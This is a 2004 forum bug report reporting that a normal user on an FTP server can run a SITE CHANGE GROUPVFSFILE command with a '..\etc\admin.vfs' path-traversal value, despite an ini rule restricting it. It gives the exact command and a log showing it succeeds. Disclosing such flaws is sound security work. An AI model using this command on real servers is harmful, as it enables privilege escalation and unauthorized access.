FlashFXP Forums - View Single Post - Bug with big security risk

darko · 12-03-2004, 08:32 PM

Every one can execute for example:
site change AnyGrp GROUPVSFILE ..\etc\admin.vfs

although in .ini its being disallowed:

Code:

[Change-Permissions]
groupvfsfile = M

Example logged in as normal user (no +M flag):

[code]
[R] (02:15:54) SITE CHANGE AnyGrp GROUPVFSFILE ..\etc\admin.vfs
[R] (02:15:55) 200 CHANGE Command successful.
[R] (02:16:15) CWD .

This is pretty bad :<

12-03-2004, 08:32 PM
darko Member Join Date: May 2004 Posts: 74	Bug with big security risk - GROUPVFSFILE Every one can execute for example: site change AnyGrp GROUPVSFILE ..\etc\admin.vfs although in .ini its being disallowed: Code: [Change-Permissions] groupvfsfile = M Example logged in as normal user (no +M flag): [code] [R] (02:15:54) SITE CHANGE AnyGrp GROUPVFSFILE ..\etc\admin.vfs [R] (02:15:55) 200 CHANGE Command successful. [R] (02:16:15) CWD . This is pretty bad :<